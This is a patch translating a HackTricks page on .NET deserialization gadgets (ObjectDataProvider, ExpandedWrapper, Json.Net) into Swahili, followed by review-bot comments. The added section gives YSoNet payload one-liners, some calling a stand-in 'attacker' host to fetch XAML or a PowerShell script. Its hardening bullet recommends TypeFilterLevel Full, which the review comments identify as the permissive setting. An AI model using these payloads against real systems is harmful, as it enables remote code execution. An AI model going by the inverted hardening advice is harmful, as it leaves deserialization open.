From f0666d9eb436824689ab2be42816f5b083ed2290 Mon Sep 17 00:00:00 2001 From: Translator Date: Tue, 29 Jul 2025 10:13:00 +0000 Subject: [PATCH] Translated ['src/pentesting-web/deserialization/basic-.net-deserializati --- ...er-gadgets-expandedwrapper-and-json.net.md | 57 +++++++++++++++++-- 1 file changed, 51 insertions(+), 6 deletions(-) diff --git a/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md b/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md index 9e1cf6155..2045998ae 100644 --- a/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md +++ b/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md @@ -1,4 +1,4 @@ -# Msingi wa .Net deserialization (gadget ya ObjectDataProvider, ExpandedWrapper, na Json.Net) +# Msingi wa .Net deserialization (Gadget ya ObjectDataProvider, ExpandedWrapper, na Json.Net) {{#include ../../banners/hacktricks-training.md}} @@ -30,7 +30,7 @@ Kumbuka kwamba mwishoni mwa msimbo inaita `this.QueryWorke(null)`. Hebu tuone in ![](<../../images/image (596).png>) -Kumbuka kwamba hii si msimbo kamili wa kazi ya `QueryWorker` lakini inaonyesha sehemu ya kuvutia: Msimbo **unaita `this.InvokeMethodOnInstance(out ex);`** hii ndiyo mistari ambapo **seti ya njia inaitwa**. +Kumbuka kwamba hii si msimbo kamili wa kazi ya `QueryWorker` lakini inaonyesha sehemu ya kuvutia ya hiyo: Msimbo **unaita `this.InvokeMethodOnInstance(out ex);`** hii ndiyo mistari ambapo **seti ya njia inaitwa**. Ikiwa unataka kuangalia kwamba kwa kuweka tu _**MethodName**_** itatekelezwa**, unaweza kukimbia msimbo huu: ```java 
@@ -56,9 +56,9 @@ Kumbuka kwamba unahitaji kuongeza kama rejeleo _C:\Windows\Microsoft.NET\Framewo ## ExpandedWrapper -Kwa kutumia exploit iliyotangulia kutakuwa na kesi ambapo **kitu** kitakuwa **kimeondolewa** kama _**ObjectDataProvider**_ mfano (kwa mfano katika DotNetNuke vuln, kwa kutumia XmlSerializer, kitu kiliondolewa kwa kutumia `GetType`). Hivyo, hakutakuwa na **ufahamu wa aina ya kitu kilichofichwa** katika mfano wa _ObjectDataProvider_ (`Process` kwa mfano). Unaweza kupata [maelezo zaidi kuhusu DotNetNuke vuln hapa](https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=https%3A%2F%2Fpaper.seebug.org%2F365%2F&sandbox=1). +Kwa kutumia exploit iliyotangulia kutakuwa na kesi ambapo **kitu** kitakuwa **kimeondolewa** kama _**ObjectDataProvider**_ mfano (kwa mfano katika DotNetNuke vuln, kwa kutumia XmlSerializer, kitu kiliondolewa kwa kutumia `GetType`). Hivyo, hakutakuwa na **ufahamu wa aina ya kitu kilichofichwa** katika mfano wa _ObjectDataProvider_ (`Process` kwa mfano). Unaweza kupata zaidi [habari kuhusu DotNetNuke vuln hapa](https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=https%3A%2F%2Fpaper.seebug.org%2F365%2F&sandbox=1). -Darasa hili linaruhusu **kueleza aina za vitu vya vitu vilivyofichwa** katika mfano fulani. Hivyo, darasa hili linaweza kutumika kuficha kitu cha chanzo (_ObjectDataProvider_) ndani ya aina mpya ya kitu na kutoa mali tunazohitaji (_ObjectDataProvider.MethodName_ na _ObjectDataProvider.MethodParameters_).\ +Darasa hili linaruhusu s**pecify aina za vitu vya vitu vilivyofichwa** katika mfano fulani. 
Hivyo, darasa hili linaweza kutumika kuficha kitu cha chanzo (_ObjectDataProvider_) ndani ya aina mpya ya kitu na kutoa mali tunazohitaji (_ObjectDataProvider.MethodName_ na _ObjectDataProvider.MethodParameters_).\ Hii ni muhimu sana kwa kesi kama ile iliyowasilishwa hapo awali, kwa sababu tutakuwa na uwezo wa **kuficha \_ObjectDataProvider**_** ndani ya mfano wa **_**ExpandedWrapper** \_ na **wakati wa kuondolewa** darasa hili litaunda _**OjectDataProvider**_ kitu ambacho kitafanya **kazi** iliyoonyeshwa katika _**MethodName**_. Unaweza kuangalia wrapper hii kwa kutumia msimbo ufuatao: @@ -85,11 +85,11 @@ myExpWrap.ProjectedProperty0.MethodName = "Start"; ``` ## Json.Net -Katika [ukurasa rasmi](https://www.newtonsoft.com/json) inaonyeshwa kwamba maktaba hii inaruhusu **Kuhifadhi na kufungua tena kitu chochote cha .NET kwa kutumia serializer wa JSON wenye nguvu wa Json.NET**. Hivyo, ikiwa tunaweza **kufungua tena gadget ya ObjectDataProvider**, tunaweza kusababisha **RCE** kwa kufungua tena kitu. +Katika [ukurasa rasmi](https://www.newtonsoft.com/json) inabainishwa kwamba maktaba hii inaruhusu **Kuhifadhi na kufungua tena kitu chochote cha .NET kwa kutumia serializer wa JSON wenye nguvu wa Json.NET**. Hivyo, ikiwa tunaweza **kufungua tena gadget ya ObjectDataProvider**, tunaweza kusababisha **RCE** kwa kufungua tena kitu. ### Mfano wa Json.Net -Kwanza kabisa hebu tuone mfano wa jinsi ya **kuhifadhi/kufungua tena** kitu kwa kutumia maktaba hii: +Kwanza kabisa, hebu tuone mfano wa jinsi ya **kuhifadhi/kufungua tena** kitu kwa kutumia maktaba hii: ```java using System; using Newtonsoft.Json; 
@@ -184,4 +184,49 @@ TypeNameHandling = TypeNameHandling.Auto } } ``` +## Advanced .NET Gadget Chains (YSoNet & ysoserial.net) + +Teknolojia ya ObjectDataProvider + ExpandedWrapper iliyotambulishwa hapo juu ni moja tu ya MIFUMO MINGI ya gadget ambazo zinaweza kutumika vibaya wakati programu inafanya **deserialization isiyo salama ya .NET**. Zana za kisasa za red-team kama **[YSoNet](https://github.com/irsdl/ysonet)** (na ya zamani [ysoserial.net](https://github.com/pwntester/ysoserial.net)) zinaweza kuunda **grafu za vitu vya uhalifu zenye matumizi tayari** kwa mamia ya gadgets na muundo wa serialization. + +Hapa chini kuna rejeleo lililokandamizwa la mnyororo wa gadgets wenye manufaa zaidi uliotolewa na *YSoNet* pamoja na maelezo ya haraka ya jinsi yanavyofanya kazi na amri za mfano za kuzalisha payloads. + +| Gadget Chain | Key Idea / Primitive | Common Serializers | YSoNet one-liner | +|--------------|----------------------|--------------------|------------------| +| **TypeConfuseDelegate** | Inaharibu rekodi ya `DelegateSerializationHolder` ili, mara itakapoundwa, delegate iwe inarejelea *yoyote* njia iliyotolewa na mshambuliaji (mfano `Process.Start`) | `BinaryFormatter`, `SoapFormatter`, `NetDataContractSerializer` | `ysonet.exe TypeConfuseDelegate "calc.exe" > payload.bin` | +| **ActivitySurrogateSelector** | Inatumia `System.Workflow.ComponentModel.ActivitySurrogateSelector` ili *kuepuka uainishaji wa aina za .NET ≥4.8* na moja kwa moja kuita **kijenga** cha darasa lililotolewa au **kuandika** faili ya C# papo hapo | `BinaryFormatter`, `NetDataContractSerializer`, `LosFormatter` | `ysonet.exe ActivitySurrogateSelectorFromFile ExploitClass.cs;System.Windows.Forms.dll > payload.dat` | +| **DataSetOldBehaviour** | Inatumia uwakilishi wa **XML wa zamani** wa `System.Data.DataSet` ili kuunda aina zisizo na mipaka kwa kujaza maeneo ya `` / `` (kwa hiari ikifanya uongo wa assembly kwa `--spoofedAssembly`) | `LosFormatter`, `BinaryFormatter`, `XmlSerializer` | 
`ysonet.exe DataSetOldBehaviour "" --spoofedAssembly mscorlib > payload.xml` | +| **GetterCompilerResults** | Katika mazingira ya WPF (> .NET 5) inafunga getters za mali hadi kufikia `System.CodeDom.Compiler.CompilerResults`, kisha *inaandika* au *inaongeza* DLL iliyotolewa na `-c` | `Json.NET` isiyo na aina, `MessagePack` isiyo na aina | `ysonet.exe GetterCompilerResults -c Loader.dll > payload.json` | +| **ObjectDataProvider** (review) | Inatumia WPF `System.Windows.Data.ObjectDataProvider` kuita njia isiyo na mipaka ya static kwa hoja zilizo na udhibiti. YSoNet inaongeza toleo la `--xamlurl` la urahisi kuhost XAML mbaya kwa mbali | `BinaryFormatter`, `Json.NET`, `XAML`, *n.k.* | `ysonet.exe ObjectDataProvider --xamlurl http://attacker/o.xaml > payload.xaml` | +| **PSObject (CVE-2017-8565)** | Inajumuisha `ScriptBlock` ndani ya `System.Management.Automation.PSObject` inayotekelezwa wakati PowerShell inafanya deserialization ya kitu | PowerShell remoting, `BinaryFormatter` | `ysonet.exe PSObject "Invoke-WebRequest http://attacker/evil.ps1" > psobj.bin` | + +> [!TIP] +> Payload zote zina **andikwa kwenye *stdout*** kwa chaguo-msingi, na kufanya iwe rahisi kuzituma kwenye zana nyingine (mfano: ViewState generators, base64 encoders, HTTP clients). 
+ +### Building / Installing YSoNet + +Ikiwa hakuna binaries zilizotengenezwa kabla zinapatikana chini ya *Actions ➜ Artifacts* / *Releases*, amri ifuatayo ya **PowerShell** itaunda mazingira ya kujenga, kunakili hifadhi na kuandika kila kitu katika *Release* mode: +```powershell +Set-ExecutionPolicy Bypass -Scope Process -Force; +[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; +iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1')); +choco install visualstudio2022community visualstudio2022-workload-nativedesktop msbuild.communitytasks nuget.commandline git --yes; + +git clone https://github.com/irsdl/ysonet +cd ysonet +nuget restore ysonet.sln +msbuild ysonet.sln -p:Configuration=Release +``` +The compiled `ysonet.exe` can then be found under `ysonet/bin/Release/`. + +### Detection & Hardening +* **Gundua** mchakato wa mtoto usiotarajiwa wa `w3wp.exe`, `PowerShell.exe`, au mchakato wowote unaofanya deserialization ya data iliyotolewa na mtumiaji (kwa mfano, `MessagePack`, `Json.NET`). +* Wezesha na **lazimisha uchujaji wa aina** (`TypeFilterLevel` = *Full*, `SurrogateSelector` ya kawaida, `SerializationBinder`, *n.k.*) kila wakati `BinaryFormatter` / `NetDataContractSerializer` ya zamani haiwezi kuondolewa. +* Pale inapowezekana hamasisha **`System.Text.Json`** au **`DataContractJsonSerializer`** na converters za msingi wa orodha nyeupe. +* Zuia maktaba hatari za WPF (`PresentationFramework`, `System.Workflow.*`) zisipakuliwe katika michakato ya wavuti ambazo hazipaswi kuzihitaji kamwe. + +## References +- [YSoNet – .NET Deserialization Payload Generator](https://github.com/irsdl/ysonet) +- [ysoserial.net – original PoC tool](https://github.com/pwntester/ysoserial.net) +- [Microsoft – CVE-2017-8565](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-8565) + {{#include ../../banners/hacktricks-training.md}}
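Review bot: In the ExpandedWrapper hunk (@@ -56,9 +56,9 @@) the bold marker in the replacement line is misplaced and leaves an untranslated English fragment: `Darasa hili linaruhusu s**pecify aina za vitu vya vitu vilivyofichwa**` opens the `**` mid-word, so the rendered text reads "s" followed by bold "pecify ...". The removed line `Darasa hili linaruhusu **kueleza aina za vitu vya vitu vilivyofichwa**` was both well-formed and fully in Swahili; restore that wording (or at least move the `**` in front of a Swahili verb) rather than shipping "pecify".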
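Review bot: In the new "Detection & Hardening" list (@@ -184,4 +184,49 @@) the type-filtering advice is inverted: `TypeFilterLevel` = *Full* is the permissive setting for `BinaryFormatter` / .NET Remoting that deserializes any type, while *Low* is the restrictive one, so the bullet should recommend *Low* (together with a `SerializationBinder` that allows only expected types). Also in this hunk: `System.Workflow.*` is Windows Workflow Foundation, not a WPF library, so the last bullet should say ".NET assemblies such as `PresentationFramework` and `System.Workflow.*`"; the `DataSetOldBehaviour` row has two empty inline code spans (`` / ``) and an empty `""` argument in the one-liner, which looks like angle-bracket placeholders were stripped during translation, so restore or escape them; the headings "Advanced .NET Gadget Chains", "Building / Installing YSoNet", "Detection & Hardening" and the sentence "The compiled `ysonet.exe` can then be found under `ysonet/bin/Release/`." are left in English in an otherwise Swahili page; and `Payload zote zina **andikwa kwenye *stdout***` splits the verb "zinaandikwa" across the bold marker, while "MIFUMO MINGI" is shouted in caps where the surrounding text is not.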